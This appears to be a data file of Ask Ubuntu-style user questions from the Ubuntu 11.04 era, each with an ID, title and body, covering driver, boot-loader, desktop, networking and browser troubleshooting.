40032	how to set terminal title on taskbar ( panel ) ?	i can set the title of terminal using `` set title '' , but that title is not visible when the terminal is minimalized . the default title is being shown on the taskbar ( where all open applications are visible ) . how to change that title ?
40033	remove drivers intalled from additional drivers section	ubuntu 11.04 was working fine with my nvidia gt550m graphic card . it has got all shadows , effects etc . but yesterday i noticed the `` additional drivers '' icon in notification area and installed it . but now after login it says `` your graphic card does not support unity , log in to classic gnome '' . how can i uninstall the driver and roll back to default one ?
40034	disable signature probing for repositories in update-manager	update-manager brought up an update today , but refused to install it . `` this action would require the installation of packages from not authenticated package sources . '' ( transliterated error message , could n't locate english original ) that 's because of a package from a custom old/flat debian-style repository , which no gpg keys are available for ( and i wo n't bug the maintainer about it ) . also it was working perfectly fine with update-manager before . so i assume there was a recent change . is there are an apt.conf setting or an update-manager configuration ability to disable that check ? since it 's probably not possible for a single repository , i 'd rather disable all checks now . ( typical security outcome for nonsensical restrictions . ) i 've worked around the issue now with a manual apt-get upgrade - where the signature-less repository is still a normal warning , not a fatal error . but i would prefer to have a user-friendly solution to this , and again use the update-manager update button when it pops up next time . still unresolved . i 've found out about the apt-get -- allow-unauthenticated option meanwhile . but that does n't help me for update-manager . apt : :get : :allowunauthenticated `` true '' ; adding this apt.conf setting also did n't alter the behaviour .
40038	how can i force network manager to associate to a specific access point ?	in my network environment i have two access points with the same essid ; one of them is near my desktop and another is in another building . i get signal from both of them , and the connection often switches from the near one to the far one , leading to a connection drop . how can i force network manager to use only a given ap , ignoring the other ?
40039	is it possible to set up a separate session with gnome shell built from source as default ?	this post explains how to build gnome shell from source thus preventing unity wreckage . there 's also a line which sets shell as the default window manager at startup . i was wondering , would it be possible to create a new session which loads gnome shell on startup while keeping the other sessions ( unity and classic gnome ) unaltered and usable ? thanks for your help !
40040	install virtualbox image as operating system	would it be possible to install the windows xp ( service pack 3 ) operating system , with all its installed programs , from a virtualbox 4.06 ( running on ubuntu 11.04 ) .vdi file , as a non-virtual , primary operating system ? ( or to 'copy ' an existing windows xp installation into a .vdi file , and then re-open it in virtualbox under ubuntu ? ) ( edit : the operating system is windows xp )
40043	natty graphical corruption	originally i did a upgrade for 10.04.. saw the corruption.. then did a fresh install on same hardware only to find the same behavior . any help is appreciated.. some details : running gnome classic ( no-effects ) , corruption seems to set in roughly 10 minutes into session ( not sure why , but seems to be the behavior ) .. hardware is lenovo x301 image can be provided ( cant post here.. no rep ) .. basically its across the entire desktop horizontal lines .
40045	why is my harddrive louder , when i use windows , compared to linux ?	this is something i noticed : when i use windows , my hard drive is louder and running almost all the time . in ubuntu on the other hand , it runs quieter and more seldom . this even applies , when i start a windows-virtual machine on ubuntu host system and the noise goes up . i observed this on several computers and set-ups . any ideas ? can someone confirm this ?
40046	how do i run qemu with 64bit processor on a 64bit machine ?	i 'm running ubuntu 11.04 64 bit and recently installed qemu-kvm . now i want to start a 64bit live cd using qemu -m 512 -boot d -cdrom archlinux-2010.05-netinstall-x86_64.iso this loads the image and i can select to boot archlinux the normal way , but it will give me an error that i have to use 64bit machine to run this live cd . now , i tried to get a list of cpu qemu can emulate for me , and ended up with this output : axle @ z370l : ~/downloads $ qemu -cpu ? x86 [ n270 ] x86 [ athlon ] x86 [ pentium3 ] x86 [ pentium2 ] x86 [ pentium ] x86 [ 486 ] x86 [ coreduo ] x86 [ kvm32 ] x86 [ qemu32 ] x86 [ kvm64 ] x86 [ core2duo ] x86 [ phenom ] x86 [ qemu64 ] x86 [ host ] so , how do i make qemu emulate a 64bit cpu ?
40047	tool to convert accented characters to html entities ?	is there a tool ( command-line is fine ) that can convert accented characters to html entities in ubuntu ? preferably recursively and without also converting html/php tags . e.g . from : ăš to : & # 233 ; or : & eacute ;
40053	is there a way of activating altgr as a means of putting accents on vowels ?	on windows , i use the altgr key to input european characters into my text when contacting foreign clents . is there a way of getting the same function in ubuntu ?
40054	how do i save files in /var/www in netbeans ?	http : //www.howtogeek.com/howto/ubuntu/installing-php5-and-apache-on-ubuntu/ i followed that site and installed php on my ubuntu 11.04 . i 'm using net beans 7 rc1 to develop programs . a small problem in php . as per that installation it specifies that php files should save in `` /var/www '' this works good i checked . but prob is when using netbeans php files are defaultly saved in /home/usr/netbeansproject/ ... something like this so that directly i ca n't able to run it . each and every time i transfered php files in /var/www to run it . i tried something to change in netbeans but i ca n't do that properly . can anyone help me to change that directory either from php side or netbens . ( step by step thnks guys ... .. )
40055	when will the catalyst 11.4 driver be available ?	i 've seen a lot of questions about unity performance . when is an official ubuntu update for the proprietary ati driver coming . people are saying this is improving unity performance a lot . sorry but i 'm new to ubuntu and a little bit afraid to do this change myself .
40056	why do i have 2 specular folder for java installed in my ubuntu ?	i have 2 specular folder for java . one is : /usr/lib/jvm/java-6-sun-1.6.0.24 and the other is /usr/lib/jvm/java-6-sun . why 2 different folder containing ( it seems ) the same things , and which one will be upgraded from package manager ? which one i have to set as my $ java_home ? thanks
40057	how to change the default graphical terminal from vt7 ?	the gnome desktop environment starts in vt7 by dafault . how do i change it to start in vt12 ? i have already tried editing /etc/default/console-setup to specify active terminals as 1-11 , and then running 'sudo setupcon ' from a console terminal . the gnome desktop environment still starts in vt7 after a restart . i have also added 'setupcon ' before the 'exit 0 ' line in /etc/rc.local , but that had no effect either .
40063	how to monitor my wireless connection	i have setup a home wifi zone and can connect my laptop/phone to it successfully . i want to know , whether there is any tool/command which allows me to monitor my network connection easily . for example i want to make sure that it 's me only who is connected to the network .
40064	sleeping does n't work	currently on natty my sony vaio f11 does not recover from sleeping and just goes in to normal boot mode . what 's the best way to go about debugging this ?
40066	need a firefox 2.0 download link ( working )	i am trying to get hold of a firefox 2.0.x version . i can not get any working download link . all links are failing . can anyone help me with a working link ? why ff2.0 ? i am trying to run webex ( cisco ) which apparently runs only in ff2.0 . thanks in advance .
40068	show bssid of an access point ?	i want to get the bssid for a known ssid , how can i do that ? thanks : - )
40072	how to stop apache2 , mysql from starting automatically as computer starts ?	my os is 11.04. i have apache2 & mysql installed . how to stop apache2 , mysql from starting automatically as computer starts ?
40074	screen is blank after installing unless i boot with the monitor unplugged	i 've spent most of today installing server 11.04 . while i ca n't get network installs to work at all ( different issue , i 'll post a separate question/bug ) , when installing from the server cd , all goes well until i reboot . when the computer reboots , i 'm presented with a blank screen . i ca n't switch to other virtual terminals , but the system is running . by accident i found that if i boot with the monitor unplugged , and plug it in after the computer is booted , the login prompt displays just fine . this is a server , so there is no xorg involved , but it seems as though it tries to display some unsupported text mode . i 've replicated it on two servers . one is a dell and one is an hp . they both have onboard video , no secondary video card . any idea where to change that ?
40080	where are flash cookies stored ?	flash cookies used to be located in ~/.macromedia . this folder no longer exists in 11.04 . i chose to install flash via the ubuntu installer option . so where are the flash cookies now located ? i 've tried searching for .sol with no luck - and yes i have 'show hidden files ' enabled . anyone know ?
40084	open the menus in chromium with the alt+ shortcut	i have enabled the menu bar for chromium from about : flags ; but to open the file menu for example , it ca n't be done with alt + f as all apps . is there a way to make it happens ?
40085	sensors-detect did not detect sensors	i want to see the temperature of my graphic card , motherboard , processor , fans etc ... when i run sudo sensors-detect in terminal and answer all questions to yes i did not get nothing ... i just get : now follows a summary of the probes i have just done . just press enter to continue : when i run sensors in terminal then , it shows only the cpu temperature . what can i do to fix this ? thanks in advance !
40086	how can i make rm stop asking me for permission ?	on my server rm always asks me for permission ( even though i 'm root ) when i run it , on my desktop it does not . like so : $ rm mod_wsgi-3.3.tar.gz rm : remove regular file `mod_wsgi-3.3.tar.gz ' ? how do i make it stop prompting me ?
40090	how to remap macbook 5,1 damaged 'ctrl ' key to a command key ?	i have a macbook and i want to remap the keyboard because my ctrl key stops working so i found this how to , but since the ctrl key does n't work i ca n't obtend the keycode that this tutorial mention is there another way to do this ? . my macbook its an aluminium unibody ( 5,1 ) btw
40093	google-chrome-stable immediately closes on startup	hi i installed and reinstalled google-chrome-stable chrome and chromium from the synaptic package manager . each time i try to use the browser it closes . when i tried to open the browser from terminal , this is what the machine did : $ google-chrome [ 2731:2747:760246373 : error : cookie_monster.cc ( 958 ) ] found 1 duplicate cookies for > host='google.com ' , with { name='pref ' , domain='.google.com ' , path='/ ' } [ 2731:2731:762969060 : fatal : syncable.cc ( 1557 ) ] check failed : successor.good ( ) . aborted . any thoughts on how to address the duplicate cookie issue and getting chrome up and running ? thanks
40097	what restrictions are there on paid applications ?	if i pay for a program can i install it on the three computers i use on a daily basis ? how is licensing decided or are there any restrictions on licenses used ? where are these kinds of questions documented ?
40102	why is firefox trying to use okular to open downloads ?	i 'm asking my question here because i ca n't find an answer anywhere else and the ubuntu forums have not helped at all . i am running firefox and ubuntu 11.04 on a dell dimension 9200 . everything was working fine up to the point where i opened a file in firefox ... i downloaded several file using firefox 4.01 . while downloading the files firefox opened the small downloads browser window as is normal . i then right-clicked on a pdf file and chose open with okular . the file did not open . i did a right-click on the same file and chose open containing folder . this failed as well . the problem i now have is every time i try to open anything from the firefox downloads browser window it tries to open it with okular . i also can not right-click the file and use open containing folder because it also tries to open in okular . everything now tries to open in okular . what is stranger still is that now if i try to open any of my folders fro the ubuntu places menu ( such as home folder , videos , pictures , etc . ) they all try to open in okular . none of them actually open and all i get is the following error message : failed to execute default file manager . failed to execute child process `` /user/bin/okular '' i have uninstalled and reinstalled both okular and firefox . i even deleted all of the firefox preference files and i still get this error message . i am also wondering if it may be that my kensington exper mouse trackball driver/software has associated all of these actions with the right-click on the mouse ( that is , everything that happens with the right-click tries to open in okular ) . any suggestions on how to correct this problem ?
40107	is there a way to control vlc from the sound menu ?	is there a plugin for this ? i 'd really like to be able to pause/play/skip in vlc from the sound menu .
40112	why does shotwell have the x & y positions inverted when using crop	when i try to crop an image with shotwell and select custom crop the x and y are inverted . i think it should be like this : the first number is how long the image is ( x ) and the second how high it is ( y ) .
40116	how to make all windows appear in center of the screen when you start them up ?	i want my program 's windows to appear in the center of the screen because when i start a program it all was hides the dock . or if the dock i allways on under them . and im talking unity here : )
40117	unity sidebar not to launch a chrome if already running	how can i configure unity 's sidebar to have the following behaviour : 1 ) if i click on a program icon , and it 's already running - switch to it . 2 ) if i click on a program icon , and it 's not running - launch it . more similar to mac , or windows 7 's behaviour . it currently does not work for google chrome .
40119	how do i delete totem 's history ?	how do i delete totem 's history displayed in it 's main menu in natty ? for example if i do n't want anyone to know i 'm watching ... ehem simpsons a lot ? i 've tried how can i keep recent files from appearing in unity ? but this doesnt work for totem .
40120	what happens to shift-alt-f [ 1..12 ] in gnome desktop ?	when i key in ctl-alt-f [ 1..12 ] , i am taken to vt1 [ ..12 ] ( virtual terminal 1..12 ) . this works wherever i am . from a virtual terminal that is not running a graphical environment , shift-alt-f [ 1..12 ] takes me to virtual terminal [ 13..24 ] . however , if i use the same key-combination from any virtual termial that is running a graphical environment - gnome , kde , xfce or lxde , these key combinations are simply ignored . it does n't matter which vt the graphical environment is running in , the keystrokes are still sent to that great bit-bucket in the sky . what is happening here - is the x-server somehow eating these keystrokes ? is there any way i can get x-server not to eat them ?
40121	nvidia config missing `` driver line '' in default device section , not booting to gui	i 've just installed a clean version of 11.04 and i am trying to get the nvidia driver to work . just after installing i 've seen unity and used it . then i activated the nvidia driver ( from the additional drivers dialog ) or i just restarted ( i do n't remember well anymore ) and i got a message telling me that unity did n't want and i got into classic mode . in the additional drivers dialog it says the nvidia driver is `` activated but not currently in use '' . i found out that i should do a sudo nvidia-xconfig , which gave back : using x configuration file : `` /etc/x11/xorg.conf '' . validation error : data incomplete in file /etc/x11/xorg.conf . device section `` default device '' must have a driver line . backed up file '/etc/x11/xorg.conf ' as '/etc/x11/xorg.conf.backup ' new x configuration file written to '/etc/x11/xorg.conf' ( exactly as posted on the ubuntuforums before . i also have the same version , `` nvidia-xconfig : version 270.41.06 '' . ) after i reboot i can see the ubuntu logo bith the four dots starting up and then only a console with some starting messages : starting acpi deamon [ ok ] .. more of such starting messages .. modem-manager [ 778 ] : modemmanager ( version 0.4 ) starting ... .. and more modem-manager loading plugin messages .. .. and ending with : stopping flush boot log to disk [ ok ] skipping profile in /etc/apparmor.d/disable : usr.bin.firefox [ ok ] and then nothing happens anymore . i stay in this console and ca n't get into a graphical mode in a normal way . i can reboot in recovery mode and start a classic gui , replace the xorg.conf with the backuped one and have everything working again . and thus also repeat this whole process over and over again . but the nvidia driver is still `` not currently in use '' . anyone knowing a next hint to help me further ?
40123	free ubuntu one mobile ?	is there any chance for a free version of ubuntu one mobile that might be ad-supported ?
40126	how to copy/paste a table from libreoffice calc to libreoffice writer	i am trying to copy/paste a 4 column table from libreoffice calc to libreoffice writer but when i paste it , it makes a table extraction from calc . i also created a table in libreoffice writer using the table tool in writer an tried to paste the data from the calc table into the writer table . it created yet the same thing , another calc table copy . so how can i grab the content of a 4 column table in calc and paste it in a 4 column table from writer .
40128	how do i find running programs that are not visible ?	this is not a request for killing applications . i can well kill all process , no matter what . that 's not the issue . the issue is : when we `` close '' skype or banshee , or korganizer or many many others , it is common that , after we do that , **we have an icon on the panel ( near the clock ) . however , that has not been the case here . once i do that , i have no icon on the panel , near the clock , as a result , i ca n't easily re-display the application window as normally should happen . how can make those icons appear on the panel ?
40130	totem : use -- no-existing-session as default	is there any way to always automatically use the parameter -- no-existing-session for totem ? i want to use that parameter whenever i double click on anything that will open totem . thanks !
40131	how to install and boot on a raid 5 configuration ?	i 've been trying for a couple of days now to get ubuntu 10.10 installed on a raid 5 setup . i have 3 1tb drives so i also need ubuntu to boot off of one of those drives . from what i 've been able to find on the forums i need to set one of the drives to have a raid 1 partition that i can use for /boot but i have no idea how to do that ( something about using gparted ? ) . i 'm farily new at this so a step-by-step would be awesome but i 'll take any help i can get .
40133	unity not showing after 11.04 upgrade . can not log out to switch to classic ?	i have upgraded an old desktop that i use as htpc from 10.10 to 11.04 . it has an old 256mb nvidia card . after the upgrade ubuntu will boot but all that shows is the wallpaper , no unity , windows , nothing . the problem is i had the box configured to auto login and so now i can not log out to switch to classic mode ( which i know works because it works on the livecd ! ) . how can i log out when i can not see anything ? terminal will not display . is there some key combination at boot that will allow me to force it to classic mode ( unlikely ) . can i boot into a livecd , mount the hard drive and change some config file to turn off auto login ? any help much appreciated ! i do n't want to format the drive and start over !
40135	chromium blocks flash plug-in because it 's outdated even after update	i do not consider this a duplicate of this . i am not trying to run a specific version of flash , rather i 'm trying to run any version , preferably the latest , without chromium auto-disabling it . i get a warning stating : the flash plug-in was blocked because it is out of date with two options : [ run this time ] and [ update plug-in ] when i press update plug-in , i get a page with the following info : if you are using the open source chromium browser , please download and install the flash player plug-in below . to learn more about flash player and chromium , see this technote . i tried installing through apt , a couple of things happened , i gave my admin password , and it was all completed succesfully . restarted chrome , and the warning persists . trying again , i noticed that no matter what version i select , there appears a box under it that reads : browser : firefox , mozilla , seamonkey since i 'm using chromium , i guess this might not be the right version . i can not however select a different version . when i go to about : plugins , chromium tells me : flash ( 2 files ) - version : 10.2.152 download critical security update shockwave flash 10.2 r152 here 's a screenshot of the webpage i get when i click update , and one of my about : plugins . i 've tried disabling the first one , without result :
40145	using appindicators with the qt framework	is there a class or library somewhere that makes it easy to use the new appindicator framework from within a qt application ? it seems strange that i should have to include gtk headers / libraries etc . just to create an indicator in qt . is there a better way ?
40149	dual boot issues with windows 7 and ubuntu	i 'm finding myself in a rather unique situation . i 've read through just about every resource i can find about this and while things have helped me understand some background , i have n't yet been able to find a solution . so i 'm asking here . i originally had just a windows 7 64-bit os installation on my desktop . learning that i could n't do anything with apache , php and mysql from within a 64-bit system , i did some research and found out that i could use ubuntu . i 've installed the latest version : 11.04 . i created a cd to install ubuntu from and the install went just fine . i installed it side-by-side with windows 7 . i can boot into ubuntu just fine through the dual-boot option . when i reboot to load windows though , the grub2 list shows windows 7 ( loader ) and when i select this option the windows system recovery loads instead of the actual os . i have n't made it past there because i did n't know what to do . i just shut the computer down and rebooted into ubuntu . i 've been working for the last hour and a half to try to figure out how to boot into the windows 7 os and i have n't got a clue . while i 'm somewhat proficient with windows 7 , i 'm totally new to ubuntu , so if you do know what needs to happen , please keep it simple enough that i 'll be able to understand . thanks for all your help in advance . here 's the results after using the boot info script : boot info script 0.55 dated february 15th , 2010 ============================= boot info summary : ============================== = > grub 2 is installed in the mbr of /dev/sda and looks on the same drive in partition # 5 for cbh . = > windows is installed in the mbr of /dev/sdb = > grub 2 is installed in the mbr of /dev/mapper/pdc_bdadcfbdif and looks on the same drive in partition # 5 for cbh . sda1 : _________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . mounting failed : fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy sda2 : _________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . mounting failed : fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy sda3 : _________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . mounting failed : fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy sdb1 : _________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files/dirs : /bootmgr /boot/bcd sdb2 : _________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files/dirs : sdb3 : _________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files/dirs : /bootmgr /boot/bcd sdb4 : _________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sdb5 : _________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 11.04 boot files/dirs : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sdb6 : _________________________________________________________________________ file system : swap boot sector type : - boot sector info : pdc_bdadcfbdif1 : _________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : boot files/dirs : /bootmgr /boot/bcd pdc_bdadcfbdif2 : _________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files/dirs : /bootmgr /boot/bcd /windows/system32/winload.exe pdc_bdadcfbdif3 : _________________________________________________________________________ file system : boot sector type : unknown boot sector info : mounting failed : fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy fuse : mount failed : device or resource busy mount : unknown filesystem type '' =========================== drive/partition info : ============================= drive : sda ___________________ _____________________________________________________ disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start end size id system /dev/sda1 * 2,048 206,847 204,800 7 hpfs/ntfs /dev/sda2 206,911 1,440,372,735 1,440,165,825 7 hpfs/ntfs /dev/sda3 1,440,372,736 1,464,856,575 24,483,840 7 hpfs/ntfs drive : sdb ___________________ _____________________________________________________ disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start end size id system /dev/sdb1 * 2,048 206,847 204,800 7 hpfs/ntfs /dev/sdb2 206,911 1,342,554,688 1,342,347,778 7 hpfs/ntfs /dev/sdb3 1,930,344,448 1,953,521,663 23,177,216 7 hpfs/ntfs /dev/sdb4 1,342,556,158 1,930,344,447 587,788,290 5 extended /dev/sdb5 1,342,556,160 1,896,806,399 554,250,240 83 linux /dev/sdb6 1,896,808,448 1,930,344,447 33,536,000 82 linux swap / solaris drive : pdc_bdadcfbdif ___________________ _____________________________________________________ disk /dev/mapper/pdc_bdadcfbdif : 750.0 gb , 749999947776 bytes 255 heads , 63 sectors/track , 91182 cylinders , total 1464843648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start end size id system /dev/mapper/pdc_bdadcfbdif1 * 2,048 206,847 204,800 7 hpfs/ntfs /dev/mapper/pdc_bdadcfbdif2 206,911 1,440,372,735 1,440,165,825 7 hpfs/ntfs /dev/mapper/pdc_bdadcfbdif3 1,440,372,736 1,464,856,575 24,483,840 7 hpfs/ntfs /dev/mapper/pdc_bdadcfbdif3 ends after the last sector of /dev/mapper/pdc_bdadcfbdif blkid -c /dev/null : ____________________________________________________________ device uuid type label /dev/mapper/pdc_bdadcfbdif1 888e54cc8e54b482 ntfs system /dev/mapper/pdc_bdadcfbdif2 c2766bf6766bea1d ntfs os /dev/mapper/pdc_bdadcfbdif : pttype= '' dos '' /dev/sda1 888e54cc8e54b482 ntfs system /dev/sda2 c2766bf6766bea1d ntfs os /dev/sda3 be6ca31d6ca2cf87 ntfs hp_recovery /dev/sda promise_fasttrack_raid_member /dev/sdb1 20b65685b6565b7c ntfs system /dev/sdb2 b4467a314679f508 ntfs hp /dev/sdb3 6e10b7a410b77227 ntfs factory_image /dev/sdb4 : pttype= '' dos '' /dev/sdb5 266f9801-cf4f-4acc-affa-2092be035f0c ext4 /dev/sdb6 1df35749-a887-45ff-a3de-edd52239847d swap /dev/sdb : pttype= '' dos '' error : /dev/mapper/pdc_bdadcfbdif3 : no such file or directory error : /dev/sdc : no medium found error : /dev/sdd : no medium found error : /dev/sde : no medium found error : /dev/sdf : no medium found error : /dev/sdg : no medium found ============================ `` mount | grep ^/dev output : =========================== device mount_point type options /dev/sdb5 / ext4 ( rw , errors=remount-ro , commit=0 ) =========================== sdb5/boot/grub/grub.cfg : =========================== # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( /dev/sdb , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 266f9801-cf4f-4acc-affa-2092be035f0c if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm fi terminal_output gfxterm insmod part_msdos insmod ext2 set root= ' ( /dev/sdb , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 266f9801-cf4f-4acc-affa-2092be035f0c set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 2.6.38-8-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( /dev/sdb , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 266f9801-cf4f-4acc-affa-2092be035f0c linux /boot/vmlinuz-2.6.38-8-generic-pae root=uuid=266f9801-cf4f-4acc- affa-2092be035f0c ro quiet splash vt.handoff=7 initrd /boot/initrd.img-2.6.38-8-generic-pae } menuentry 'ubuntu , with linux 2.6.38-8-generic-pae ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( /dev/sdb , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 266f9801-cf4f-4acc-affa-2092be035f0c echo 'loading linux 2.6.38-8-generic-pae ... ' linux /boot/vmlinuz-2.6.38-8-generic-pae root=uuid=266f9801-cf4f-4acc-affa-2092be035f0c ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.38-8-generic-pae } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( /dev/sdb , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 266f9801-cf4f-4acc-affa-2092be035f0c linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( /dev/sdb , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 266f9801-cf4f-4acc-affa-2092be035f0c linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sdb1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( /dev/sdb , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 20b65685b6565b7c chainloader +1 } menuentry `` windows recovery environment ( loader ) ( on /dev/sdb3 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( /dev/sdb , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 6e10b7a410b77227 drivemap -s ( hd0 ) $ { root } chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # =============================== sdb5/etc/fstab : =============================== # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb5 during installation uuid=266f9801-cf4f-4acc-affa-2092be035f0c / ext4 errors=remount-ro 0 1 # swap was on /dev/sdb6 during installation uuid=1df35749-a887-45ff-a3de-edd52239847d none swap sw 0 0 =================== sdb5 : location of files loaded by grub : =================== 900.1gb : boot/grub/core.img 825.0gb : boot/grub/grub.cfg 688.7gb : boot/initrd.img-2.6.38-8-generic-pae 688.0gb : boot/vmlinuz-2.6.38-8-generic-pae 688.7gb : initrd.img 688.0gb : vmlinuz =========================== unknown mbrs/boot sectors/etc ======================= unknown bootloader on pdc_bdadcfbdif3 =======devices which do n't seem to have a corresponding hard drive============== sdc sdd sde sdf sdg =============================== stderr messages : =============================== error : dos : partition address past end of raid device hexdump : /dev/mapper/pdc_bdadcfbdif3 : no such file or directory hexdump : /dev/mapper/pdc_bdadcfbdif3 : no such file or directory error : dos : partition address past end of raid device
40150	stop an insolent narwhal from `` correcting '' monitor brightness ?	i want total absolute control over the brightness of my laptop 's screen . i want natty to fear my wrath should it dare to presume my desire . natty 's light adjusting minions should quake in terror before my sword , apt-get purge ! but alas , this sword cuts an arm where i 'd prefer lobotomy . i need a scalpel , some precise tool to cut into natty 's brain and enforce my will . does such a tool exist ? is there known to the citizens of ubuntu a method to restore my sovereign power ? further investigation reveals natty only auto-dims the screen when running loose on battery power . chain the beast to an electrical outlet and it is tamed . i see these two screens in natty 's power management , neither appear relevant :
40154	window freezes when hulu is running and monitor shuts off	when i 'm watching something on hulu in full screen and my power management tells my monitor to shut off the window locks up and i ca n't exit the full screen mode . pressing any keys or combination of keys does nothing . running 11.04
40156	weird looking google earth	i just installed 64-bit google earth from .deb file downloaded from the official site . now when i open google earth it looks all weird . here 's a screenshot : . how to get it right ?
40158	why am i experiencing super slow internet browsing & downloads ?	i 'm pretty new to ubuntu . i installed ubuntu netbook remix 10.10 and it works perfectly . i recently upgraded to 11.04 and now the internet is very slow ; when browsing it would take quite a while to simply load a page . i tried switching browsers and it would still happen . i 've changed back to unr so the internet is usable . any ideas of what i should try ? thanks .
40161	bash : change environment temporarily	i am using a dev tool which supplies a script that sets environment variables . if i source the script the environment is modified for the duration of the bash secession . in order to revert the changes made by that script i need to restart the terminal . is there a way to do it without restarting or opening new bash session ? thanks .
40165	how to open a file in gedit with zenity -- file-selection as root	i try to open a file in gedit with the file-selection option of zenity . it 's very easy to do it for file that i can access in normal mode , but i wan na open too some configuration files ( as for exemple the conf files for vpnc ) which are in a '700 ' folder ( only the user root can read , write and execute the folder ) i dont wan na change the permissions for the folder . i tryed this : gksudo -u root `` gedit $ ( zenity -- file-selection ) '' but it did n't work is someone have an idea of how i can do it ? thx in advance folks br ,
